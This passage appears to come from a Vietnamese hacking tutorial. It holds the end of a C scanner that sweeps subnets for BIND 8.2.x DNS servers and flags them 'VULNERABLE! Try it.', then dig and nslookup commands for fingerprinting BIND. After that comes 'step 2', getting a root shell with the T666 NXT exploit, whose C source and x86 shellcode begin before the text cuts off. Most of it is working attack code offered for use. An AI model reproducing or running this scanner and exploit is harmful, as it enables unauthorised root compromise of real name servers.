if( (name[0] <= '0') || (name[0] >= '9') ) { host_entry = gethostbyname( name ); if( host_entry == NULL ) { if( option[0] != 1 ) { printf( "Can not scan %s.\n", name ); exit(0); } } if( option[0] != 1 ) { addr = *((struct in_addr *)host_entry->h_addr); ip = (unsigned char *)inet_ntoa( addr ); subnet = GetSubnet( ip ); } } if( (name[0] >= '0') && (name[0] <= '9') ) { host_entry = gethostbyaddr( name, strlen(name), AF_INET ); if( host_entry == NULL ) { if( option[0] != 1 ) { printf( "Can not scan %s.\n", name ); exit(0); } } if( option[0] != 1 ) { addr = *((struct in_addr *)host_entry->h_addr); ip = (unsigned char *)inet_ntoa( addr ); subnet = GetSubnet( ip ); } } if( (option[1] == 0) && (option[2] == 0) && (option[0] != 1) ) { Scan( ip ); printf( "Scanning Done.\n" ); remove( R1_DIR ); remove( R2_DIR ); exit(0); } if( option[1] == 1 ) { for( i = 0; i < 256; i++ ) { if( fork() == 0 ) { strcpy( subnet, itoa( i ) ); ip_s = ChangeSubnet( ip, subnet ); Scan( ip_s ); remove( R1_DIR ); remove( R2_DIR ); exit(0); } else { wait( NULL ); } continue; } printf( "Scanning Done.\n" ); exit(0); } if( option[2] == 1 ) { strcpy( cmd, SCAN_EXE ); strcat( cmd, name ); strcat( cmd, "/24" ); strcat( cmd, " > " ); strcat( cmd, R1_DIR ); chdir( SCAN_DIR ); system( cmd ); strcpy( cmd, "grep \"Interesting\" " ); strcat( cmd, R1_DIR ); strcat( cmd, " > " ); strcat( cmd, R2_DIR ); system( cmd ); if( ( fp = fopen( R2_DIR, "r" ) ) < 0 ) { printf( "File Open Error!\n" ); exit(0); } while( 1 ) { bzero( name, 200 ); temp = (char *)malloc( 200 ); strcpy( temp, " " ); temp = fgets( temp, 100, fp ); if( temp == NULL ) break; if( temp[21] == ' ' ) { for( i = 0; i < 16; i++ ) { if( (temp[i+23] != ' ') && (temp[i+23] != ')') ) { if( (temp[i+23] >= '0') && (temp[i+23] <= '9') ) { name[i] = temp[i+23]; } else { if( temp[i+23] == '.' ) name[i] = temp[i+23]; } } } } if( temp[21] != ' ' ) { for( i = 0; i < 50; i++ ) { if( temp[i+21] != ' ' ) name[i] = temp[i+21]; } } Scan( name ); free(temp); } remove( R1_DIR ); remove( R2_DIR ); } if( option[0] == 1 ) { printf( "Creator : Laks Bluesky\n" ); printf( "E-mail : <a href="mailto:lb0gspm@hanmail.net">lb0gspm@hanmail.net</a>\n\n" ); printf( "Version : 2.00 beta\n\n" ); printf( "2000.06.19\n" ); exit(0); } } char *itoa( int i ) { char *ret; char c; int count; ret = (char *)malloc( 4 ); count = 1; if( i > 9 ) count = 2; if( i > 99 ) count = 3; if( count == 1 ) { c = i+48; ret[0] = c; ret[1] = '\0'; return ret; } if( count == 2 ) { c = i / 10; i = i - (c*10); ret[0] = c+48; ret[1] = i+48; ret[2] = '\0'; return ret; } if( count == 3 ) { c = i / 100; i = i - (c*100); ret[0] = c+48; c = i / 10; i = i - (c*10); ret[1] = c+48; ret[2] = i+48; ret[3] = '\0'; return ret; } } char *ChangeSubnet( char *ip, char *subnet ) { char *ip_s; int count = 0, i = 0; ip_s = (char *)malloc( 16 ); strcpy( ip_s, ip ); for( count = 0; count != 3; count = count ) { if( ip_s[i] == '.' ) { count++; i++; continue; } i++; } ip_s[i++] = subnet[0]; ip_s[i++] = subnet[1]; ip_s[i++] = subnet[2]; ip_s[i++] = subnet[3]; return ip_s; } char *GetSubnet( char *ip ) { char *ret; int count = 0, i = 0; ret = (char *)malloc( 4 ); for( count = 0; count != 3; count = count ) { if( ip[i] == '.' ) { count++; i++; continue; } i++; } ret[0] = ip[i++]; ret[1] = ip[i++]; ret[2] = ip[i++]; ret[3] = ip[i++]; return ret; } int Scan( char *ip ) { unsigned short int i; unsigned char c; unsigned char *cmd; unsigned char *version; FILE *fp; struct stat result; cmd = (char *)malloc( 200 ); version = (char *)malloc( 9 ); printf( "Scanning %s\n", ip ); strcpy( cmd, "dig @" ); strcat( cmd, ip ); strcat( cmd, " version.bind chaos txt > " ); strcat( cmd, R1_DIR ); strcat( cmd, " 2> /dev/null" ); system( cmd ); strcpy( cmd, "grep \"VERSION.BIND.\" " ); strcat( cmd, R1_DIR ); strcat( cmd, " > " ); strcat( cmd, R2_DIR ); system( cmd ); stat( R2_DIR, &result ); if( result.st_size < 30 ) { chdir( CBIND_DIR ); return 0; } if( ( fp = fopen( R2_DIR, "r" ) ) >= 0 ) { for( i = 0; i < 29; i++ ) { c = fgetc( fp ); } for( i = 0; i < 9; i++ ) { c = fgetc( fp ); if( c == '"' ) { version[i] = '\0'; break; } version[i] = c; } } else { chdir( CBIND_DIR ); return 0; } if( strcmp( version, "8.2" ) == 0 ) { printf( "%s: IT IS VULNERABLE! ", ip ); printf( "Try it. \n" ); chdir( CBIND_DIR ); return 0; } if( strcmp( version, "8.2.1" ) == 0 ) { printf( "%s: IT IS VULNERABLE! ", ip ); printf( "Try it. \n" ); chdir( CBIND_DIR ); return 0; } if( strcmp( version, "8.2.2" ) == 0 ) { printf( "%s: IT IS VULNERABLE! ", ip ); printf( "Try it. \n" ); chdir( CBIND_DIR ); return 0; } if( strcmp( version, "8.2.2-P5" ) == 0 ) { chdir( CBIND_DIR ); return 0; } if( strcmp( version, "8.1.2" ) == 0 ) { chdir( CBIND_DIR ); return 0; } chdir( CBIND_DIR ); return 0; } * Bạn có thể dùng hai tiện ích sẵn có trong Linux là DIG và NSLOOKUP để nhận diện version của BIND NSLOOKUP # nslookup Default Server: ns.yourco.bogus Address: 333.333.333.333 > set class=chaos> set type=txt > version.bind Server: ns.yourco.bogus Address: 333.333.333.333 VERSION.BIND text = "8.2.2-P5" >DIG (cú pháp lệnh: dig @<server_ip> <domain> <query-type> <query-class>) dig version.bind txt chaos @<server>hoặc dig @ txt chaos version.bind Nếu bạn thấy trên màn hình 8.2 hoặc 8.2.2 nghĩa là server này có thể gặp bug "nxt" Bước 2: lấy root shell bằng T666 #include <stdio.h>#include <unistd.h>#include <stdlib.h>#include <signal.h>#include <time.h>#include <string.h>#include <ctype.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>#include <arpa/inet.h>#include <arpa/nameser.h>#include <netdb.h> char linuxcode[]= {0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d, 0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0, 0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9, 0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0, 0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3, 0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89, 0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56, 0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75, 0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73, 0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69, 0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74, 0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79, 0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69, 0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67, 0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56, 0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0, 0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0, 0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3, 0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46, 0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff, 0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,